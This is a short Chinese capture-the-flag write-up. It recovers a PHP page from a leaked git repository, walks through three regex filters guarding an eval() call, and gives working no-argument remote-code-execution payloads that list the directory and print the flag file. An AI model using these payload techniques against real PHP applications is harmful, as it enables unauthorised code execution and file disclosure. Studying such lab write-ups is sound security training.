dirsearch扫描目录发现存在git泄露
于是用GitHack 生成index.php
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>
稍微审计一下代码
有三个过滤
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp']))
第一层过滤告诉我们不能用php伪协议了
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))
第二层过滤表示,只能是xxx(xxx(xxx(…)));这样形式的函数嵌套,没有参数
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']))
第三层过滤了一些关键词段
这道题思路就是无参RCE
无参数RCE理解与利用
构造payload
?exp=var_dump(scandir(current(localeconv())));
数组翻转然后取第二元素值
使用payload
?exp=show_source(next(array_reverse(scandir(current(localeconv())))));